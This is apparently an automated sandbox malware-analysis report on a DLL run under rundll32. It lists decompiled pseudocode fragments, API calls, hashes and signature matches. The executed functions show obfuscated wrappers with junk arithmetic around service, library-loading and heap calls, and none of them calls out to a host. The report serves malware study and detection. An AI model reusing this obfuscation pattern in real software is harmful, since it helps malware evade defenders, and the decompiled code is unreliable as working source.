				intOrPtr* _t110;
				intOrPtr* _t111;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t121;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t147;
				void* _t148;
				void* _t150;

				_t114 = __edi;
				_t84 = __ebx;
				_t42 = _a4;
				_t101 = 0;
				if(_t42 == 0) {
					L3:
					return _t101;
				} else {
					_t155 = _t42 - 0xffffffff;
					if(_t42 > 0xffffffff) {
						L4:
						E10005E79(__eflags);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t147 = _t150;
						_push(_t84);
						_t85 = _v0;
						_push(_t114);
						_t129 = _t101;
						_t102 = _a4;
						_t115 =  *((intOrPtr*)(_t85 + 0x10));
						__eflags = _t115 - _t102;
						if(__eflags < 0) {
							_push("invalid string position");
							E10005ED8(__eflags);
							goto L30;
						} else {
							_t121 = _t115 - _t102;
							__eflags = _a8 - _t121;
							_t115 =  <  ? _a8 : _t121;
							__eflags = _t129 - _t85;
							if(_t129 != _t85) {
								__eflags = _t115 - 0xfffffffe;
								if(__eflags > 0) {
									goto L31;
								} else {
									_t67 =  *((intOrPtr*)(_t129 + 0x14));
									__eflags = _t67 - _t115;
									if(_t67 >= _t115) {
										__eflags = _t115;
										if(_t115 != 0) {
											goto L14;
										} else {
											 *((intOrPtr*)(_t129 + 0x10)) = _t115;
											__eflags = _t67 - 0x10;
											if(_t67 < 0x10) {
												_t74 = _t129;
												 *_t74 = 0;
												return _t74;
											} else {
												 *((char*)( *_t129)) = 0;
												return _t129;
											}
										}
									} else {
										E10001180(_t129, _t115,  *((intOrPtr*)(_t129 + 0x10)));
										_t102 = _a4;
										__eflags = _t115;
										if(_t115 == 0) {
											L28:
											return _t129;
										} else {
											L14:
											__eflags =  *((intOrPtr*)(_t85 + 0x14)) - 0x10;
											if( *((intOrPtr*)(_t85 + 0x14)) >= 0x10) {
												_t85 =  *_t85;
											}
											__eflags =  *((intOrPtr*)(_t129 + 0x14)) - 0x10;
											if( *((intOrPtr*)(_t129 + 0x14)) < 0x10) {
												_t111 = _t129;
											} else {
												_t111 =  *_t129;
											}
											__eflags = _t115;
											if(_t115 != 0) {
												E100083B0(_t111, _t85 + _t102, _t115);
											}
											__eflags =  *((intOrPtr*)(_t129 + 0x14)) - 0x10;
											 *((intOrPtr*)(_t129 + 0x10)) = _t115;
											if( *((intOrPtr*)(_t129 + 0x14)) < 0x10) {
												 *((char*)(_t129 + _t115)) = 0;
												goto L28;
											} else {
												 *((char*)( *_t129 + _t115)) = 0;
												return _t129;
											}
										}
									}
								}
							} else {
								_t78 = _t115 + _t102;
								__eflags =  *((intOrPtr*)(_t129 + 0x10)) - _t78;
								if(__eflags < 0) {
									L30:
									_push("invalid string position");
									E10005ED8(__eflags);
									L31:
									_push("string too long");
									E10005EAA(__eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t147);
									_t148 = _t150;
									_push(_t85);
									_t86 = _v28;
									_push(_t129);
									_t130 = _t102;
									__eflags = _t86;
									if(_t86 == 0) {
										L44:
										_push(_t115);
										_t116 = _v0;
										__eflags = _t116 - 0xfffffffe;
										if(__eflags > 0) {
											_push("string too long");
											E10005EAA(__eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t148);
											_push(_t130);
											_t131 = _v44;
											_t49 = E10005F06(_t131);
											__eflags = _t49;
											_t50 = _v48;
											 *_t50 = _t131;
											if(_t49 == 0) {
												 *((intOrPtr*)(_t50 + 4)) = 0x1002600c;
												return _t50;
											} else {
												 *((intOrPtr*)(_t50 + 4)) = 0x10026004;
												return _t50;
											}
										} else {
											_t51 =  *((intOrPtr*)(_t130 + 0x14));
											__eflags = _t51 - _t116;
											if(_t51 >= _t116) {
												__eflags = _t116;
												if(_t116 != 0) {
													goto L47;
												} else {
													 *((intOrPtr*)(_t130 + 0x10)) = _t116;
													__eflags = _t51 - 0x10;
													if(_t51 < 0x10) {
														_t58 = _t130;
														 *_t58 = 0;
														return _t58;
													} else {
														 *((char*)( *_t130)) = 0;
														return _t130;
													}
												}
											} else {
												E10001180(_t130, _t116,  *((intOrPtr*)(_t130 + 0x10)));
												__eflags = _t116;
												if(_t116 == 0) {
													L59:
													return _t130;
												} else {
													L47:
													__eflags =  *((intOrPtr*)(_t130 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t130 + 0x14)) < 0x10) {
														_t52 = _t130;
													} else {
														_t52 =  *_t130;
													}
													__eflags = _t116;
													if(_t116 != 0) {
														E100083B0(_t52, _t86, _t116);
													}
													__eflags =  *((intOrPtr*)(_t130 + 0x14)) - 0x10;
													 *((intOrPtr*)(_t130 + 0x10)) = _t116;
													if( *((intOrPtr*)(_t130 + 0x14)) < 0x10) {
														 *((char*)(_t130 + _t116)) = 0;
														goto L59;
													} else {
														 *((char*)( *_t130 + _t116)) = 0;
														return _t130;
													}
												}
											}
										}
									} else {
										_t104 =  *((intOrPtr*)(_t130 + 0x14));
										__eflags = _t104 - 0x10;
										if(_t104 < 0x10) {
											_t62 = _t130;
										} else {
											_t62 =  *_t130;
										}
										__eflags = _t86 - _t62;
										if(_t86 < _t62) {
											goto L44;
										} else {
											__eflags = _t104 - 0x10;
											if(_t104 < 0x10) {
												_t110 = _t130;
											} else {
												_t110 =  *_t130;
											}
											__eflags =  *((intOrPtr*)(_t130 + 0x10)) + _t110 - _t86;
											if( *((intOrPtr*)(_t130 + 0x10)) + _t110 <= _t86) {
												goto L44;
											} else {
												__eflags = _t104 - 0x10;
												if(_t104 < 0x10) {
													_push(_v0);
													_t65 = _t130;
													_t91 = _t86 - _t65;
													__eflags = _t91;
													_push(_t91);
													_push(_t130);
													L5();
													return _t65;
												} else {
													_push(_v0);
													_t66 =  *_t130;
													_t93 = _t86 - _t66;
													__eflags = _t93;
													_push(_t93);
													_push(_t130);
													L5();
													return _t66;
												}
											}
										}
									}
								} else {
									__eflags =  *((intOrPtr*)(_t129 + 0x14)) - 0x10;
									 *((intOrPtr*)(_t129 + 0x10)) = _t78;
									if( *((intOrPtr*)(_t129 + 0x14)) < 0x10) {
										_push(_t102);
										 *((char*)(_t129 + _t78)) = 0;
										E10001700(_t85, _t129, 0);
										return _t129;
									} else {
										_push(_t102);
										 *((char*)( *_t129 + _t78)) = 0;
										E10001700(_t85, _t129, 0);
										return _t129;
									}
								}
							}
						}
					} else {
						_push(_t42);
						_t101 = E10007764(__ebx, __edi, _t155);
						_t150 = _t150 + 4;
						if(_t101 == 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
			}

0x100013e0
0x100013e0
0x100013e3
0x100013e6
0x100013ea
0x10001400
0x10001403
0x100013ec
0x100013ec
0x100013ef
0x10001406
0x10001406
0x1000140b
0x1000140c
0x1000140d
0x1000140e
0x1000140f
0x10001411
0x10001413
0x10001414
0x10001418
0x10001419
0x1000141b
0x1000141e
0x10001421
0x10001423
0x10001512
0x10001517
0x00000000
0x10001429
0x10001429
0x1000142b
0x1000142e
0x10001432
0x10001434
0x1000147d
0x10001480
0x00000000
0x10001486
0x10001486
0x10001489
0x1000148b
0x100014b1
0x100014b3
0x00000000
0x100014b5
0x100014b5
0x100014b8
0x100014bb
0x100014cb
0x100014d0
0x100014d4
0x100014bd
0x100014c0
0x100014c8
0x100014c8
0x100014bb
0x1000148d
0x10001493
0x10001498
0x1000149b
0x1000149d
0x10001509
0x1000150f
0x1000149f
0x1000149f
0x1000149f
0x100014a3
0x100014a5
0x100014a5
0x100014a7
0x100014ab
0x100014d7
0x100014ad
0x100014ad
0x100014ad
0x100014d9
0x100014db
0x100014e3
0x100014e8
0x100014eb
0x100014ef
0x100014f2
0x10001505
0x00000000
0x100014f4
0x100014f6
0x10001500
0x10001500
0x100014f2
0x1000149d
0x1000148b
0x10001436
0x10001436
0x10001439
0x1000143c
0x1000151c
0x1000151c
0x10001521
0x10001526
0x10001526
0x1000152b
0x10001530
0x10001531
0x10001532
0x10001533
0x10001534
0x10001535
0x10001536
0x10001537
0x10001538
0x10001539
0x1000153a
0x1000153b
0x1000153c
0x1000153d
0x1000153e
0x1000153f
0x10001540
0x10001541
0x10001543
0x10001544
0x10001547
0x10001548
0x1000154a
0x1000154c
0x100015a5
0x100015a5
0x100015a6
0x100015a9
0x100015ac
0x1000162c
0x10001631
0x10001636
0x10001637
0x10001638
0x10001639
0x1000163a
0x1000163b
0x1000163c
0x1000163d
0x1000163e
0x1000163f
0x10001640
0x10001643
0x10001644
0x10001648
0x10001650
0x10001652
0x10001655
0x10001657
0x10001665
0x1000166e
0x10001659
0x10001659
0x10001662
0x10001662
0x100015ae
0x100015ae
0x100015b1
0x100015b3
0x100015ce
0x100015d0
0x00000000
0x100015d2
0x100015d2
0x100015d5
0x100015d8
0x100015e8
0x100015ed
0x100015f1
0x100015da
0x100015dd
0x100015e5
0x100015e5
0x100015d8
0x100015b5
0x100015bb
0x100015c0
0x100015c2
0x10001623
0x10001629
0x100015c4
0x100015c4
0x100015c4
0x100015c8
0x100015f4
0x100015ca
0x100015ca
0x100015ca
0x100015f6
0x100015f8
0x100015fd
0x10001602
0x10001605
0x10001609
0x1000160c
0x1000161f
0x00000000
0x1000160e
0x10001610
0x1000161a
0x1000161a
0x1000160c
0x100015c2
0x100015b3
0x1000154e
0x1000154e
0x10001551
0x10001554
0x1000155a
0x10001556
0x10001556
0x10001556
0x1000155c
0x1000155e
0x00000000
0x10001560
0x10001560
0x10001563
0x10001569
0x10001565
0x10001565
0x10001565
0x10001570
0x10001572
0x00000000
0x10001574
0x10001574
0x10001577
0x1000158f
0x10001592
0x10001596
0x10001596
0x10001598
0x10001599
0x1000159a
0x100015a2
0x10001579
0x10001579
0x1000157c
0x10001580
0x10001580
0x10001582
0x10001583
0x10001584
0x1000158c
0x1000158c
0x10001577
0x10001572
0x1000155e
0x10001442
0x10001442
0x10001446
0x10001449
0x10001466
0x1000146b
0x1000146f
0x1000147a
0x1000144b
0x1000144d
0x10001452
0x10001456
0x10001461
0x10001461
0x10001449
0x1000143c
0x10001434
0x100013f1
0x100013f1
0x100013f7
0x100013f9
0x100013fe
0x00000000
0x00000000
0x00000000
0x00000000
0x100013fe
0x100013ef

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10001406

Part of subcall function 10007764: _malloc.LIBCMT ref: 1000777C

Strings

invalid string position, xrefs: 1000151C
string too long, xrefs: 10001526

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
String ID: invalid string position$string too long
API String ID: 657562460-4289949731
Opcode ID: 0344ebb91343afb5d02c29ea29245405f47a00220ba818449f2fb51860ccc3c8
Instruction ID: 3f6e02fbd29b9ef1c9690413c605602239c78518062bbf334c17a0ca81aa8226
Opcode Fuzzy Hash: 0344ebb91343afb5d02c29ea29245405f47a00220ba818449f2fb51860ccc3c8
Instruction Fuzzy Hash: C8D0A77470834A03BE0CD17A48125AB31C8CF086F2B024139BB1BC76D9E935F9114055

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2472 Parent PID: 2872 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	961
Total number of Limit Nodes:	14

Executed Functions

Function 001D7FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E001D7FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001CE171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E001C606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x001d7fcf
0x001d7fd2
0x001d7fd4
0x001d7fd7
0x001d7fda
0x001d7fdd
0x001d7fdf
0x001d7fe4
0x001d7fed
0x001d7ff4
0x001d7ffb
0x001d8002
0x001d800e
0x001d8013
0x001d8018
0x001d801f
0x001d8029
0x001d8034
0x001d8037
0x001d803b
0x001d8042
0x001d8049
0x001d8050
0x001d806f
0x001d807e
0x001d8084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 001D807E

Strings

Ia, xrefs: 001D8018
K=, xrefs: 001D7FE4

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: f780d85f295fd0aa3aad21468766ecfc0e265b5accef9e4503af8e688740e7ed
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: FE115971E00218EBEF04DFE5C90A8DEBFB2EB41310F108189FA1466250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D29A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 001D2A76

Strings

-:, xrefs: 001D29C4

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 3d91dc7d8e8f70b51de454d7596b622e0cd896f7984e1d23ef5fec51c4d61123
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: 362153B2D01219BBDF15DFD5C84A8DEBBB5FF14758F108088E92862210D3B98B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001C30A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E001C30A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001CE171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E001C606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x001c30ab
0x001c30ae
0x001c30b0
0x001c30b3
0x001c30b7
0x001c30b8
0x001c30bd
0x001c30c6
0x001c30cd
0x001c30d4
0x001c30db
0x001c30e2
0x001c30e9
0x001c30f5
0x001c30fa
0x001c30ff
0x001c3109
0x001c3114
0x001c3117
0x001c311e
0x001c3125
0x001c312c
0x001c314b
0x001c3154
0x001c315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 001C3154

Strings

_;m, xrefs: 001C313C

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 6bb8085b0547b0102b1ffaf7b26fe8547b22063a2f78327ab1852417bd83d23d
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: 19113D76E00218FFEB04DFE8CC468DEBBB1EB54310F108599E924AB292D7B55B119B91

Uniqueness

Uniqueness Score: -1.00%

Function 001CE172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E001CE172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001CE171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E001C606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x001ce178
0x001ce17b
0x001ce17e
0x001ce181
0x001ce185
0x001ce186
0x001ce18b
0x001ce192
0x001ce19e
0x001ce1a5
0x001ce1ac
0x001ce1b3
0x001ce1ba
0x001ce1c1
0x001ce1c8
0x001ce1cf
0x001ce1d6
0x001ce1dd
0x001ce1e4
0x001ce1eb
0x001ce1f2
0x001ce1f6
0x001ce1fd
0x001ce21c
0x001ce22d
0x001ce232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 001CE22D

Strings

,., xrefs: 001CE192

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: 24f4034e0d3e734f49e84866a7de8bf36ab233f79eff65a759f8221ec28445b2
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 861107B6D0020DFFEF01DFD4C94A8AEBB70FB24304F108188E91566261D3B58B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 001D7998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E001D7998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001CE171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E001C606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x001d799e
0x001d79a1
0x001d79a4
0x001d79a9
0x001d79ae
0x001d79b5
0x001d79bc
0x001d79c3
0x001d79c7
0x001d79ce
0x001d79d5
0x001d79dc
0x001d79e3
0x001d79ea
0x001d79f1
0x001d79f5
0x001d79f9
0x001d79fd
0x001d7a04
0x001d7a0b
0x001d7a12
0x001d7a19
0x001d7a1d
0x001d7a30
0x001d7a37
0x001d7a3e
0x001d7a3f
0x001d7a4a
0x001d7a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 001D7A4A

Strings

rV, xrefs: 001D79C7

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: a4ca2e479288db054cd5dc328b5d00bd5b35a6bea1ad8120a2f563e062e48cdb
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: 6711F6B6D1160DBBDB14DFA4C84A59EBBB4BB10319F208588E92566250D3B48B149F50

Uniqueness

Uniqueness Score: -1.00%

Function 001DC7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E001DC7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E001C606F(_t44);
				ExitProcess(0);
			}

0x001dc7c9
0x001dc7cd
0x001dc7d4
0x001dc7db
0x001dc7e2
0x001dc7e9
0x001dc7ed
0x001dc7f4
0x001dc7fb
0x001dc802
0x001dc809
0x001dc810
0x001dc817
0x001dc81e
0x001dc825
0x001dc82c
0x001dc833
0x001dc83b
0x001dc842
0x001dc849
0x001dc85c
0x001dc862
0x001dc863
0x001dc86a
0x001dc86b
0x001dc875

APIs

ExitProcess.KERNELBASE(00000000), ref: 001DC875

Strings

C, xrefs: 001DC817

Memory Dump Source

Source File: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000009.00000002.2143570427.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2143600770.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: 14e5e5e89ebe872798823941106e9f62d50939f587b152c2ac3c85f5d9e2e0d6
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: E2111CB5D0130DEBEB44CFE5D94AAEEBBB0FB14318F208189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 001D0DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E001D0DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001CE171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E001C606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x001d0deb
0x001d0dee
0x001d0df1
0x001d0df6
0x001d0dfb
0x001d0e04
0x001d0e0b
0x001d0e18
0x001d0e1c
0x001d0e1f
0x001d0e26
0x001d0e32
0x001d0e37
0x001d0e3a
0x001d0e41
0x001d0e4c
0x001d0e4d
0x001d0e4e
0x001d0e55
0x001d0e58
0x001d0e5f
0x001d0e66
0x001d0e6d
0x001d0e78
0x001d0e79
0x001d0e7c
0x001d0e8f
0x001d0e9a
0x001d0e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 001D0E9A

Strings

Hh, xrefs: 001D0E58

Memory Dump Source

